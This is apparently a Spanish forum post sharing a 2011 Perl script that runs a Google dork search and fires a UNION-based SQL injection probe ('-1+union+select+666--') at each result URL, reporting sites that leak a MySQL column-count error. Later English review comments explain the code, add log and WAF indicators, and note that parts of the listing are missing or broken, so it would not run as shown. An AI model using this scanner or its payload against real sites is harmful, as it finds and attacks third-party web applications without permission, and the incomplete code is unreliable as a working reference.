Un escáner simple de SQLi para usar en Google
#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
use LWP::UserAgent;
use HTML::LinkExtor;
# Shared HTTP client: toma() and tomar() read $nave directly, so every
# request the script makes goes through this one LWP::UserAgent object.
# NOTE(review): the file has no `use strict; use warnings;`, so the
# undeclared variables used by the subs below silently become package
# globals shared across calls.
my $nave = LWP::UserAgent->new;
# Fixed browser-like User-Agent (Firefox 2.0.0.12 on Windows XP). It never
# varies between requests, so this exact string is a usable indicator when
# looking for this script's traffic in web-server or proxy logs.
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
# Abandon any single request after 5 seconds.
$nave->timeout(5);
# Print the start-up banner.
head();
# Read the search string and the paging limit from STDIN (no prompt text is
# printed for either), then ask google() for the list of candidate links.
chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages);
# Report how many links came back (int(@links) is the element count), then
# walk them. For a link containing '=', the greedy (.*) keeps everything up
# to the last '=', so the value of the final parameter is dropped and
# "<prefix>=" is what gets handed to sql(). Links without '=' are skipped.
print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n"; copyright();
# Block on one more line of input before exiting (presumably so a console
# window stays open until Enter is pressed).
<stdin>;
# google($a, $b): fetch Google result pages for a search string.
#   $a - search string, concatenated into the q= parameter exactly as given
#   $b - highest value of the start= paging offset that will be requested
# The value handed back is that of the last statement, i.e. whatever
# repes() returns for @founds.
# NOTE(review): in the text shown here nothing is ever added to @url or
# @founds and both `if` bodies are empty. Lines were probably lost when the
# listing was copied, so the link-collection logic cannot be documented.
sub google {
# NOTE(review): lexical $a/$b shadow the package variables that sort() uses.
my($a,$b) = @_;
# $pages is not declared in this sub; it resolves to the file-scoped
# `my $pages` that holds the user's input and is overwritten here. The
# offsets requested are 10, 20, ... up to $b.
for ($pages=10;$pages<=$b;$pages=$pages+10) {
# $code is an undeclared package global holding the body returned by toma().
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
# Tests for Google cache links; the dots are unescaped, so each one matches
# any character. Nothing is done with a match in the visible code.
if ($l =~/webcache.googleusercontent.com/) {
}
}
}
# @url is an undeclared package global that no visible line fills.
for(@url) {
# Two non-greedy captures after "cache:", separated by ':' and ended by a
# literal '+'. The captures are not used in the visible code.
if ($_ =~/cache:(.*?):(.*?)\+/) {
}
}
# The @founds passed to repes() is the package global: the `my` on the left
# only takes effect after this statement.
my @founds = repes(@founds);
}
# sql(): send one UNION-based probe request and report the URL when the
# response body contains MySQL's column-count mismatch error.
# NOTE(review): the caller passes a URL prefix, but @_ is never read in the
# visible code. $page is an undeclared package global that nothing shown
# here assigns, so as written the request is built from an empty value.
# Defensive reading: the check only works when the application echoes raw
# database error text to the client, and each probe leaves the literal
# "-1+union+select+666--" in the request's query string, which is
# straightforward to match in access logs or a WAF rule. Suppressing
# verbose DB errors and using parameterized queries removes the signal
# this check depends on.
sub sql {
# "+" stands in for a space inside the URL; "--" starts an SQL comment that
# cuts off the rest of the original statement.
my ($pass1,$pass2) = ("+","--");
# $code1 is an undeclared package global holding the response body.
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
# Case-insensitive match on the error text; the /g flag has no effect on
# this single boolean test.
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
# "\a" rings the terminal bell alongside the printed URL.
print "[+] SQLI : $page\a\n"; }}
# get_links($html): parse the page body in $_[0] with HTML::LinkExtor,
# using agarrar() as the per-link callback.
# NOTE(review): no return statement is visible. The value handed back
# appears to be that of the assignment to $test, i.e. whatever parse()
# returns, not a list of URLs. The lines that collected and returned the
# links were probably lost when the listing was copied.
sub get_links {
# $test is an undeclared package global; repes() uses the same name as its
# loop variable.
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
# Named subs are package-scoped in Perl, so nesting the definition here
# does not make agarrar() private to get_links().
sub agarrar {
# HTML::LinkExtor calls the callback with the tag name followed by
# attribute => value pairs. Nothing is done with them in the visible code.
my ($a,%b) = @_;
}
}
# repes(@items): append each item not seen before to @limpio, using %repe
# as the seen-set (the post-increment is false only on first sight).
# NOTE(review): @limpio and %repe are undeclared package globals, so they
# keep their contents between calls. No return statement is visible: the
# sub ends in a foreach loop, whose value Perl leaves unspecified, while
# google() assigns the result to a list. A `return @limpio;` line may have
# been lost when the listing was copied - confirm against the original.
sub repes {
# $test is a package global; foreach localizes it for the loop's duration.
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++; }
}
# Print the start-up banner to STDOUT. Takes no arguments; the value of
# print() is passed back, as in any sub whose last statement is a print.
sub head {
    my $banner = "\n\n-- == Search Google == --\n\n";
    return print $banner;
}
# Print the author notice to STDOUT. Takes no arguments; the value of
# print() is passed back.
sub copyright {
    my $notice = "\n\n(C) Doddy Hackman 2011\n\n";
    return print $notice;
}
# toma($url): GET the URL through the shared $nave client and return the
# response body.
# No status check is made: the body is returned whatever the HTTP status
# was, so an error page is indistinguishable from a normal page for callers.
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}
# tomar($web, $var): POST to $web through the shared $nave client and
# return the response body.
#   $web - target URL
#   $var - hash reference of form fields; it is flattened into a
#          key/value list and sent as the request's form data
# No status check is made on the response. Nothing in the visible part of
# the script calls this sub.
sub tomar {
    my ($web, $var) = @_;
    my @form_fields = %{$var};
    my $response = $nave->post($web, \@form_fields);
    return $response->content;
}
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
Nada como los script ... pulento aporte